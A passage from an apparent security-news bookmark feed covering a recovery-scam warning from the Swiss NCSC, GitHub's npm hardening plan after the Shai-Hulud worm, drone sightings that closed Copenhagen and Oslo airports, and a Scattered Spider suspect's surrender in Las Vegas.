Follow-up fraud (recovery scam): some time after the first scam, the victim is contacted by other cybercriminals posing as representatives of an official body such as the police, a financial supervisory authority, a law firm or, indeed, the NCSC. They explain that they have arrested the perpetrators of the initial fraud and have recovered the money the victim lost.
This type of scam demands an advance payment. To get their money back, the victim must first make a transfer. The scammers cite various pretexts such as processing fees, lawyers' fees, administrative costs or taxes. As soon as the victim has paid, the cybercriminals cut off all contact or invoke further urgent fees to extract an even larger amount. The victim thus loses money once again and, of course, receives no refund.

Recommendations
Be very wary of unsolicited emails promising to refund money you have lost.
Never make any payment to recover money you have lost. No official body will ask you for an advance payment.
Never give the person contacting you access to your computer.
Check the sender's email address. Authorities such as the OFCS or the NCSC never use a free email provider to communicate.
Do not reply to these emails and do not click on the links or attachments they contain.
In the event of financial loss, file a complaint with your cantonal police.

ncsc.admin.ch FR 2025 arnaque suisse DanielBruno recovery-scam refund-scam
Our plan for a more secure npm supply chain https://github.blog/security/supply-chain-security/our-plan-for-a-more-secure-npm-supply-chain/
23/09/2025 15:49:34

The GitHub Blog github.blog Xavier René-Corail (@xcorail)
September 22, 2025

Open source software is the bedrock of the modern software industry. Its collaborative nature and vast ecosystem empower developers worldwide, driving efficiency and progress at an unprecedented scale. This scale also presents unique vulnerabilities that are continually tested and under attack by malicious actors, making the security of open source a critical concern for all.

Transparency is central to maintaining community trust. Today, we’re sharing details of recent npm registry incidents, the actions we took towards remediation, and how we’re continuing to invest in npm security.

Recent attacks on the open source ecosystem
The software industry has faced a recent surge in damaging account takeovers on package registries, including npm. These ongoing attacks have allowed malicious actors to gain unauthorized access to maintainer accounts and subsequently distribute malicious software through well-known, trusted packages.

On September 14, 2025, we were notified of the Shai-Hulud attack, a self-replicating worm that infiltrated the npm ecosystem via compromised maintainer accounts by injecting malicious post-install scripts into popular JavaScript packages. By combining self-replication with the capability to steal multiple types of secrets (and not just npm tokens), this worm could have enabled an endless stream of attacks had it not been for timely action from GitHub and open source maintainers.

In direct response to this incident, GitHub has taken swift and decisive action including:

Immediate removal of 500+ compromised packages from the npm registry to prevent further propagation of malicious software.
npm blocking the upload of new packages containing the malware’s IoCs (Indicators of Compromise), cutting off the self-replicating pattern.
Such breaches erode trust in the open source ecosystem and pose a direct threat to the integrity and security of the entire software supply chain. They also highlight why raising the bar on authentication and secure publishing practices is essential to strengthening the npm ecosystem against future attacks.

npm’s roadmap for hardening package publication
GitHub is committed to investigating these threats and mitigating the risks that they pose to the open source community. To address token abuse and self-replicating malware, we will be changing authentication and publishing options in the near future to only include:

Local publishing with required two-factor authentication (2FA).
Granular tokens which will have a limited lifetime of seven days.
Trusted publishing.
To support these changes and further improve the security of the npm ecosystem, we will:

Deprecate legacy classic tokens.
Deprecate time-based one-time password (TOTP) 2FA, migrating users to FIDO-based 2FA.
Limit granular tokens with publishing permissions to a shorter expiration.
Set publishing access to disallow tokens by default, encouraging usage of trusted publishers or 2FA enforced local publishing.
Remove the option to bypass 2FA for local package publishing.
Expand eligible providers for trusted publishing.
We recognize that some of the security changes we are making may require updates to your workflows. We are going to roll these changes out gradually to ensure we minimize disruption while strengthening the security posture of npm. We’re committed to supporting you through this transition and will provide future updates with clear timelines, documentation, migration guides, and support channels.

Strengthening the ecosystem with trusted publishing
Trusted publishing is a recommended security capability by the OpenSSF Securing Software Repositories Working Group as it removes the need to securely manage an API token in the build system. It was pioneered by PyPI in April 2023 as a way to get API tokens out of build pipelines. Since then, trusted publishing has been added to RubyGems (December 2023), crates.io (July 2025), npm (also July 2025), and most recently NuGet (September 2025), as well as other package repositories.

When npm released support for trusted publishing, it was our intention to let adoption of this new feature grow organically. However, attackers have shown us that they are not waiting. We strongly encourage projects to adopt trusted publishing as soon as possible, for all supported package managers.

Actions that npm maintainers can take today
These efforts, from GitHub and the broader software community, underscore our global commitment to fortifying the security of the software supply chain. The security of the ecosystem is a shared responsibility, and we’re grateful for the vigilance and collaboration of the open source community.

Here are the actions npm maintainers can take now:

Use npm trusted publishing instead of tokens.
Strengthen publishing settings on accounts, orgs, and packages to require 2FA for any writes and publishing actions.
When configuring two-factor authentication, use WebAuthn instead of TOTP.
True resilience requires the active participation and vigilance of everyone in the software industry. By adopting robust security practices, leveraging available tools, and contributing to these collective efforts, we can collectively build a more secure and trustworthy open source ecosystem for all.

github.blog EN 2025 response npm Supply-Chain-Attack
'Capable actor' behind drones at Copenhagen airport https://www.euractiv.com/news/capable-actor-behind-drones-at-copenhagen-airport/
23/09/2025 09:57:49

Euractiv euractiv.com Sep 23, 2025 - 09:44 Chris Powers, AFP / Euractiv

Danish police said on Tuesday that they did not know who was responsible for flying drones over Copenhagen airport the previous evening, but that they appeared to have been knowledgeable.

Overnight on Monday, the appearance of drones caused the main airports of both Denmark and Norway to close for several hours, causing flight diversions and other travel disruption. While flights are now resuming, heavy travel delays were expected to last throughout Tuesday.

“The number, size, flight patterns, time over the airport. All this together … indicates that it is a capable actor. Which capable actor, I do not know,” Danish police inspector Jens Jespersen told reporters at a press conference Tuesday morning.

The airport was closed for several hours before reopening early Tuesday, causing numerous delays and travel disruptions to 20,000 passengers, airport officials said.

Among those affected was European Commissioner Roxana Mînzatu, whose plane was diverted from Copenhagen to the Swedish town of Ängelholm.

Police said several large drones were seen over the Danish capital’s Kastrup airport on Monday. A heavy police presence was dispatched to investigate the drone activity, and the devices could be seen coming and going for several hours before flying away on their own.

“The drones have disappeared and the airport is open again,” Deputy Police Inspector Jakob Hansen told reporters. “We didn’t take the drones down,” he added.

Who dunnit?
Hansen said police were cooperating with the Danish military and intelligence service to find out where the drones had come from. He said police were also working with colleagues in Oslo after drone sightings in the Norwegian capital also caused the airport to close for several hours.

“We had two different drone sightings,” said Oslo airport spokeswoman Monica Fasting.

Though no culprit has been definitively identified, there is already speculation.

“Obvious to view the drones over Kastrup as a hybrid attack” was the title of a live blog post by Jakob Hvide Beim, defence editor at leading Danish newspaper Politiken. He went on to explain that the authorities have been warning about the risk of Russian hybrid attacks against Denmark “for some time now”.

Why Denmark specifically? Copenhagen’s track record of significant Ukraine support, Hvide Beim says, noting as example Denmark having “taken the lead by offering Ukrainian arms factories the opportunity to open production” in Denmark.

Ukrainian President Volodymyr Zelenskyy posted on X about a Russian incursion of Danish airspace on 22 September, albeit without providing proof or substantiating further.

Last night’s drone incursion over Denmark and Norway comes after a spate of Russian aerial incursions over NATO territory. Two weeks ago, Poland shot down several of the 20 Russian drones that entered its airspace which led Warsaw to activate NATO’s Article 4 – meaning it believes there is a credible threat to the country’s security.

Friday last week, Russian fighter jets entered Estonian airspace, lingering for 12 minutes and prompting Tallinn to likewise initiate conversations under the umbrella of Article 4, which will take place today.

(cp, vib)

euractiv.com EN airport 2025 drones Copenhagen
Alleged Scattered Spider member turns self in to Las Vegas police https://therecord.media/las-vegas-arrest-scattered-spider-suspect-turns-self-in
23/09/2025 09:45:13

The Record from Recorded Future News
Jonathan Greig
September 22nd, 2025

A 17-year-old male surrendered to police in Las Vegas and was booked on charges related to 2023 cyberattacks against the city's casino and hospitality industry.

A suspected member of the Scattered Spider cybercriminal organization turned themselves in to Las Vegas police last week under accusations that they were behind multiple cyberattacks targeting casinos in the city.

The Las Vegas Metropolitan Police Department released a brief statement on Friday afternoon confirming that an unnamed juvenile suspect surrendered himself to the Clark County Juvenile Detention Center on September 17. He was booked on several charges related to cyberattacks on multiple Las Vegas casino properties between August 2023 and October 2023, police said.

Those dates line up with ransomware attacks on Caesars Entertainment and MGM Resorts — both of which own multiple casinos and hotels across Las Vegas.

Las Vegas Police said the attacks were attributed to Scattered Spider and noted that the FBI took over the investigation.

The unnamed suspect was charged with three counts of obtaining and using the personal information of another person, one count of extortion, one count of conspiracy to commit extortion and one count of unlawful acts regarding computers.

The Clark County District Attorney’s Office said it is looking to transfer the person to the criminal division, where he will face the charges as an adult.

The ransomware attack on MGM Resorts cost the company more than $100 million and left thousands of Las Vegas visitors scrambling to deal with widespread technology outages caused by the incident. The attackers also stole sensitive personal information on millions of customers and employees.

Members of the group later launched an assault in 2025 on multiple industries — shutting down several airlines, major insurance companies and high-profile retailers from March to July.

The group most recently took credit for a damaging attack on British automotive giant Jaguar Land Rover.

Law enforcement agencies have recently stepped up efforts to arrest, charge and convict members of the group.

Last year, police in the U.K. arrested a 17-year-old for his alleged role in the MGM attack.

Last week, a U.K. national was arrested in London and concurrently charged by U.S. prosecutors for his involvement in at least 120 attacks launched by Scattered Spider.

Other members of the group were recently slapped with years-long prison sentences for launching attacks.

therecord.media EN 2025 Scattered-Spider busted teen surrendered